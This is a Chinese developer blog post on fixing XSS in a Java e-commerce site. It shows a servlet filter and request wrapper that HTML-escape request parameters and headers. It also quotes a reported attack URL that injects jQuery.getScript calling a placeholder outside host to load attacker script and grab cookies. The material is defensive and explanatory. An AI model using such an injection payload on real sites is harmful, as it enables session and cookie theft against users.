网站XSS漏洞攻击如何修补

朴灿烈づ我的快乐病毒、 2022-07-15 04:56 236阅读 0赞

因为兄弟我是在国内某知名安全公司旗下的一家电商网站上班，所以不可避免的就经常被安全部门“照顾”了，公司邮箱里经常会收到漏洞攻击的邮件，很佩服那些能找到这些漏洞的人，但是佩服归佩服，漏洞总得给补上吧，下面我介绍常用的xss攻击漏洞该如何修补。

首先你得现在web.xml文件里加上filter配置，下面配置是对所有请求生效

<filter>
            <filter-name>xssFilter</filter-name>
            <filter-class>com.galaxy.wz.front.interceptor.XssFilter</filter-class>
        </filter>
    
        <filter-mapping>
            <filter-name>xssFilter</filter-name>
            <url-pattern>/*</url-pattern>
        </filter-mapping>

对所有请求过滤，主要是重写了从http请求里获取请求参数的方法。HtmlUtils.htmlEscape()会将代码里所有含html语言的字符替换成html的转义字符，类似于<会转化为<这种转义，不过这种这种会把“转化调，所以用json传递参数的兄弟注意会不会对以前的功能产生影响，如果怕危险，就自己手动写代码替换需要替换的字符了。sql、js注入大概也就常用像> < 等字符需要替换了。

package com.galaxy.wz.front.interceptor;
    
    import javax.servlet.*;
    import javax.servlet.http.HttpServletRequest;
    import java.io.IOException;
    
    public class XssFilter implements Filter{ 
    
        public void init(FilterConfig filterConfig) throws ServletException {
    
        }
    
        public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
            HttpServletRequest httpServletRequest = (HttpServletRequest)request;
            chain.doFilter(new XssRequestWrapper(httpServletRequest), response);
        }
    
        public void destroy() {
    
        }
    }

package com.galaxy.wz.front.interceptor;
    
    import org.springframework.web.util.HtmlUtils;
    
    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletRequestWrapper;
    
    public class XssRequestWrapper extends HttpServletRequestWrapper { 
    
        public XssRequestWrapper(HttpServletRequest servletRequest) {
            super(servletRequest);
        }
        @Override
        public String[] getParameterValues(String parameter) {
            String[] values = super.getParameterValues(parameter);
            if (values == null) {
                return null;
            }
            int count = values.length;
            String[] encodedValues = new String[count];
            for (int i = 0; i < count; i++) {
                encodedValues[i] = HtmlUtils.htmlEscape(values[i]);
            }
            return encodedValues;
        }
        @Override
        public String getParameter(String parameter) {
            String value = super.getParameter(parameter);
            return HtmlUtils.htmlEscape(value);
        }
        @Override
        public String getHeader(String name) {
            String value = super.getHeader(name);
            return HtmlUtils.htmlEscape(value);
        }
    }

曾经收到过一个这样的漏洞,他说攻击者可以通过这种访问请求：[http://a.b.c/jsp/transfer.jsp?returnUrl=123%22][http_a.b.c_jsp_transfer.jsp_returnUrl_123_22]\})’;jQuery.getScript(‘[http://a.b.c][http_a.b.c]‘);\}function x()\{var x =’www.baidu.com，来完成水坑攻击或URL定向，我查了一下，原来是原来的同事将url里的returnUrl参数直接放到了js了，导致他这段js注入后将原来的js分成了两个方法，而原来该执行的方法则被换成了jQuery.getScript(‘[http://a.b.c][http_a.b.c]‘)，调用了攻击者自己的请求，可以直接截获用户的COOKIE信息。像这种XSS攻击手段防不胜防，你永远不知道攻击者有多少种手段。。。。。。

[http_a.b.c_jsp_transfer.jsp_returnUrl_123_22]: http://a.b.c/jsp/transfer.jsp?returnUrl=123%22
[http_a.b.c]: http://a.b.c